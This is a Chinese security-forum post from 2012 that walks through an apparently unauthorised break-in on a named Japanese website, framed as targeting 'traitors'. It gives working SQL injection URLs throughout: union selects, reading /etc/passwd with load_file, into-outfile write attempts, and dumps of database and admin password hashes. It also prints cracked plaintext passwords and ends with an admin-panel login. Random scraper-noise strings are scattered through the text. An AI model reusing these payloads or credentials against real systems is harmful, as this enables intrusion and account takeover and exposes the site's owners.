找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3021|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试
' F2 Q7 t. O2 J- {
- Y' G. C" t/ w& G
0x01. 检测 www.zuaa.jp 收集数据
2 [4 R+ z2 [* O  P; l- [" b+ q3 a' S% L
! ?. I. t3 w6 C- w8 z1 d( p
whatweb& u3 l8 x, M- s% l7 q: g
* Q9 J$ @" O7 o. o' \/ Z5 @

' g( [1 y" g8 f$ K利用NMAP扫描: a6 t0 }+ P' W
- V& H! p5 Y$ ~- q7 W+ e2 j
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持7 h  k# P' J9 n5 v, c! u
0x02.找注入点% b" j+ _! ^4 z6 D
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
! Y3 O+ c; u, U; l0 a9 M, R7 D
1 r3 |- L# K+ r/ c% R5 _5 u3 n4 w3 ]( \
0x03.order by) p0 ]( D3 k7 I. y7 d
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
8 q3 _, t- Q1 u, Q- j+ K3 Q2 S
) a/ ?8 g! a! K; torder by 28报错,order by 27正常
; B4 a% V* v4 |; b4 A1 `7 ~, }+ r6 e2 a2 }7 E- `( H
0x04.   union手动查询
; ^9 D1 x8 S. t2 l% {3 N1 Mhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
" c. ]0 L; K7 o" s4 f  C+ f添加到 27 时正常显示 8 u7 K7 q( x% x2 @

0 |' n) E, {3 `1 C1 B: U$ s中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持3 O+ x( q) Q- x6 }+ D

/ C1 [5 C! v( W4 H; L* U7 v- K7 M0x05. info:2 u; [! o8 |- K0 v4 V2 U/ m
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 1 K# Z# Y: I" D( q
  X( m- U  \" s& a9 T- @& g
user:            root@localhost
6 i6 m8 i3 M1 N0 m7 ?: j! jdatabase:    openpne( W2 F3 u1 o; z0 F. w4 O1 @
version:      4.1.222 @6 n* r2 r) h% V* I( O' {5 N3 G
os:             portbld-freebsd5.4
5 X8 F( v' Z* Z5 h. d. s9 r
5 Z9 d: r5 g* e$ H/ h) Y2 I0x06. root用户8 z( O! [5 g& @9 q, i2 u
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)/ N% X" g* P! x7 T, V
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
- p0 o" M$ c0 i6 a4 F1 {- p; N0 }6 k- A* c
通过工具转换0 F7 @( F' z; e7 B0 u

% a4 C! h% Q. ?7 R- {, D5 ^, e中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持/ l( @9 |1 I+ Y, L& o8 E
" _# w3 c, {* }/ E* Q% k( w& t2 p$ L
0x07. 利用 into outfile
) ]) o8 D! f5 k  \: F; @全部都失败, C. q: g  G$ Q4 z. e
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
& [1 {# S# u+ Z$ U
, B6 Q, Z3 u3 G' i1 x3 D  ?http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php 2 n  ^9 Y: @, t4 M* |+ z; W

6 K3 ~* T6 S, Y# S! \  a; p页面显示“MDB2 Error:syntax error”
: m; [# M3 k/ L+ }0 z) E
1 e8 z+ O* h3 h- I, D2 Z" C7 K/ q0x08. 利用 mysql 4.1
7 k2 {) N5 T1 |3 I0 \: R猜常规表名,字段未果 工具 sqlmap9 E; ~  ~  X: u
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
5 `/ Q( Q6 e2 R; d& k  z& c! p) t& S6 z- i

* E" Q* d# B" n! U4 z* j
2 W3 {# @0 f% |# V0 v. q0x09. 查找后台
4 o7 V3 }8 X" G9 r( d: D! b利用 现有的各种 后台工具尝试都不行
0 C. a: x0 z# G' p4 T/ A# i' X: \. H$ O$ X& h$ H. k& S. P
0x10.  MySL外联方法
0 P& s$ C; s" a从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
+ ^( Y( M7 h* G+ _可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
. t4 p- x3 G. Shttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user% u3 ^" ~8 }2 n% B" a4 d7 j
7 n0 J( s3 _7 I: ~
这个可以在 www.cmd5.com 解密: i1 W& x* E7 A1 S: C4 N7 A6 X
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009* F9 N& ]& P! J
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97) r; G: c4 p$ v+ Y6 c) h4 N
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
9 ?% [3 q4 m6 g- y" X4 dzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
; \  ?) R# M2 T7 D1 `工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知0 X- i( I- @9 Q
+ N  R( N( X, k. C" D& K
4 r1 f. r% @$ U+ A. x+ t; X1 ~
0x11. 网站突破- H- x3 [  ?7 P0 e5 m
发现网站的源程序 openpne, google 下载 openpne 源码( P" |0 A+ \; i+ J5 s  C" \

6 n1 \1 ?2 |6 i% @; j
  e; e' M- C$ }0x12. 默认信息利用- x0 ?. q4 U  B% o
http://sns.zuaa.jp/?m=admin&a=page_login& j$ l8 ^4 {0 b' x& l9 l- c4 o& p

4 Z2 a* c. ^9 f2 ^$ F# {" m$ F表名 (c_admin_user) ,字段名(username,password)
* K* J3 g  ~8 Y% |# ~9 Qhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user. ~  D: U. p. q  `" L% i. y

; `( A1 `4 Z' [+ l4 Y8 X7 z解密
+ x% Z) L* W& ezuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
& v) N: \; Q" b! }1 [zuaajp:c0923ec5857796a393da99905008c176,          zju1897) z. s3 [8 L& \# l+ O( b4 H
  n8 U9 q8 U2 C% b! a& t
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持, h5 u# ?- n- u7 F& W2 C/ j

& l* Z7 [& |4 M" G0x13. 登录后台
- z( v1 X! }4 c! o  z7 N" O! j
7 f3 H& ^5 k6 h# r4 d
9 M& U+ B$ [4 E1 m
0x14. 小结
. h6 Y: m( C( \% Y2 t7 c, t利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。6 X, @6 D' k1 |
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点4 Q( k5 }! a# F2 r1 e
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain0 c  _2 m# C3 \- d8 @
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
* x/ m( A' ?* Y9 h! m0 k$ C$ E* \" @
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
( o' q) c/ T( e3 c

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表